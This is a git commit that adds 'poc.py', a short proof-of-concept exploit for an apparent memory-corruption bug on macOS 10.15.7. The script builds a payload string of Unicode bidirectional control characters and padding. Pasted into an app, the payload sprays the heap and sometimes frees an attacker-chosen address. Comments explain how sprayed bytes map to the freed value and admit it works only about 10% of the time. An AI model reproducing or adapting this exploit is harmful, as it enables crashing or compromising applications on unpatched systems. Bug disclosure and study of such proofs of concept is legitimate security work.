From cb847c47696e38e080d3b9511d68a73a6741ae71 Mon Sep 17 00:00:00 2001 From: "spv.sh" Date: Tue, 18 Apr 2023 12:30:16 -0400 Subject: ye olde source --- poc.py | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 poc.py (limited to 'poc.py') diff --git a/poc.py b/poc.py new file mode 100644 index 0000000..581fbc9 --- /dev/null +++ b/poc.py @@ -0,0 +1,37 @@ +# python3 poc.py | pbcopy +# paste into app +# profit +# +# super stable PoC +# works about 10% of the time if you're lucky +# +# should free 0x1515151515151515 +# it like sprays that in a similar location to the free list, and sometimes ends up freeing it +# for a more controlled free you might have to find each of the 256 values (i haven't yet), and substitute them +# example: 0x41 becomes 0x15, and 0xffff becomes 0x4 +# so if you spray "\x41\x41\uffff\x41\uffff\uffff\uffff\uffff" it'll spray 0x1515041504040404, maybe something else because endianess but fuck you, whatever +# also there's like an offset of 0x2 or something +# i add "\uffff\uffff" at the start which seems to pad it for the address to work right +# it's vaguely functional, and should at least prove the bug exists +# note: this may have been patched in some big sur version (or 11.0 itself) +# run on 10.15.7, it's been tested there. + +import sys + +def lol(l2): + s = "" + a = ["\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u202f"] + b = [] + for i in a: + for j in a: + b += i + j + for i in range(l2): + s += b[i % (len(b))] + c = "\x41" * 0x8000 + if i == 6: + s += c + else: + s += "\1" + return s + +print(lol(18)) -- cgit v1.2.3